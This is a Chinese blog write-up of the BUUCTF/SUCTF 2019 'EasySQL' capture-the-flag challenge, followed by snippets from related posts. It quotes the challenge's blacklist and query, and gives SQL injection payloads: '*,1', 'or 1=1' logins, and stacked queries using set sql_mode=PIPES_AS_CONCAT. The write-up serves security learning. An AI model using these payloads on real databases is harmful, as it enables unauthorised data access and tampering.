[SUCTF 2019]EasySQL(set sql_mode=pipes_as_concat修改||)

最新推荐文章于 2023-11-28 09:37:00 发布
最新推荐文章于 2023-11-28 09:37:00 发布
阅读量548 收藏 1
点赞数 1
分类专栏: BUUCTF-WEB 文章标签: mysql 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45253573/article/details/109572159
版权

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
都被过滤,查看公开的源码
黑名单 :
$BlackList = "prepare|flag|unhex|xml|drop|create|insert|like|regexp|outfile|readfile|where|from|union|update|delete|if|sleep|extractvalue|updatexml|or|and|&|\"";
查询语句:
select $_GET['query'] || flag from flag
两种方法
都是神乎其神的网友大佬想到的
1、由于没有过滤*所以可以直接构造payload
payload: *,1
查询flag
拼接之后的语句为
select *,1 || flag from flag
先查找全部 [0] => flag{fd583590-4eef-4964-8fe5-ecd4ad6411e5},然后在查找1 [1] => 1

最低0.47元/天 解锁文章
哇gg
关注
专栏目录
buuctf easysql
hintll的博客
05-31 1653
[极客大挑战 2019]EasySQL 今天开始做buuctf上的web题 先看这题 打开链接后是一个登陆界面 首先想到的是弱口令试一下 admin admin admin 123 …… 都不行 然后考虑用bp爆破一下试试 但是这里有两个爆破的位置,所需要的时间比较长 所以应该不大概率的会是爆破 那么就只能考虑sql注入 对于有username和password的注入口 一般情况是在第一个username的地方注入然后将后面的password用#注释掉 先用普通的万能sql语句试一下 斜体样式 结果就直接
BUUCTF [SUCTF 2019]EasySQL
m0_63253040的博客
03-28 615
SQL注入之堆叠注入 参考wp博客 参考博客 原理是利用mysql_multi_query()这个函数 用;隔开,同时执行多条sql查询语句 一般情况下都是使用mysqli_ query()函数,只能执行一条语句 回到题目,首先进入环境 只有一个查询框 那么随便输点字符试试 发现输入非零数 输入其他的无回显 这里试试联合查询,发现回显nonono 其他的盲注,报错注入都被过滤了,最后是堆叠注入行 还是被过滤 最后这题是要猜测他的查询语句 ...
BUUCTF--Web--[SUCTF 2019]EasySQL
weixin_44866139的博客
04-30 7861
猜测后端执行SQL语句 输入1,有回显 输入2,有回显,输入非零数字都有回显,输入字母无回显 输入1’,没回显,应该存在sql注入,猜测可能关闭了错误回显,报错注入可能行不通了 用order去试探有多少个字段,返回的都是Nonono,可能order by 参数被过滤了,联合查询就行不通了 排除了报错注入和联合查询注入,试下盲注,布尔盲注 1 and length(database())>=...
BUUCTF-EasySQL
m0_47571887的博客
11-04 605
这是一道蛮基础的sql注入的题,打开题目 一个具有黑客色彩的登陆页面,emm,没有注册窗口,在用户名或密码处加个单引号发现报错。 判断是字符型注入,通过万能密码登陆注入进去, username=admin' or 1=1 --+&password=' 拿到flag ...
set sql_mode=PIPES_AS_CONCAT
07-16
`SET sql_mode=PIPES_AS_CONCAT` 是一条 MySQL 查询语句,用于设置 SQL 模式为 PIPES_AS_CONCATSQL 模式是 MySQL 中的一个配置选项,它决定了在执行 SQL 语句时的行为方式。PIPES_AS_CONCAT 是一种 SQL 模式,它...
1;set sql_mode=PIPES_AS_CONCAT;select 1
07-16
set sql_mode=PIPES_AS_CONCAT;select 1;` 这条语句会产生两个结果: 1. 首先,执行 `1` 这个语句并不会有实际的含义,因此不会产生任何输出。 2. 接下来,执行 `set sql_mode=PIPES_AS_CONCAT;` 这个语句会将 SQL ...
CTF学习笔记——sql注入(2)
Obs_cure的博客
08-16 605
一、[SUCTF 2019]EasySQL 看标题就知道是关于sql注入的题目。老规矩,先跑一下sqlmap,再用1’ or 1=1 #试试。 全部木大了…看writeup吧…
MySQL关于sql_mode解析与设置讲解
09-09
8. `PIPES_AS_CONCAT`: 使"||"作为字符串连接操作符,而不是逻辑运算符,与Oracle数据库的行为一致。 9. `ANSI_QUOTES`: 开启后,双引号被视为标识符的引用,而不是字符串。这意味着你不能再用双引号来包围字符...
buuctf [SUCTF 2019]EasySQL
qq_1873822的博客
03-02 386
#这里题目也是类似于[强网杯 2019]随便注 堆叠注入原理 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入:1; DELETE FROM product
BUUCTF之EasySQL [SUCTF 2019]
金 帛的博客
04-18 2906
BUUCTF的WP
BUUCTF-随便注(easy_sql
weixin_51383898的博客
10-13 487
启动靶机,首先有一个输入框,提交查询,返回一个数组将数值改成3,页面没有显示输入2,有结果,最大输入为2输入1'出现报错,参数为字符型,需要闭合单引号出现报错,尝试报错注入,被过滤了使用联合注入,过滤了关键字select,没有用尝试使用万能语句,好像没啥用,得到的信息和flag没有关联尝试使用堆叠注入,成功了发现有个数据库,查看该数据库下有哪些表有个FLAG_TABLE表,查看table表有哪些字段不是flag???,看来这个数据库不得行进入supersqli。
BUUCTF——[SUCTF2019]EasySQL
最新发布
weixin_62248541的博客
11-28 411
BUUCTF——[SUCTF2019]EasySQL
buuctf之EasySQL
qq_38634097的博客
04-18 921
pyload:1’ or1=1 # (#的意思是把后面的注释掉,在这里是注释到闭合的‘,保证语句正常执行)页面报错,说明为字符型,在构造pyload时候,需要主要闭合‘。用or是因为1=1为真,则该语句执行结果为真。1、手工判断注入类型。输入1’判断注入类型,2、构造pyload。
BUUCTF[SUCTF 2019]EasySQL
weixin_45253622的博客
05-05 198
是一道SQL注入题型。 三种回显: 输入数字: 输入英文: 输入相关注入字符: 尝试了堆叠注入: 1;show databases; # 1;show tables;# 好像离答案越来越进了。 试试 1;select * from Flag; # 经测试,发现from flag 被过滤掉了。 比赛的时候源码泄露了: select $_GET['query'] || flag from flag 解法1: payload: *,1 查询语句:
Buuctf web [SUCTF 2019]EasySQL
m0_61903191的博客
09-13 1451
又是一道考察sql注入的题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值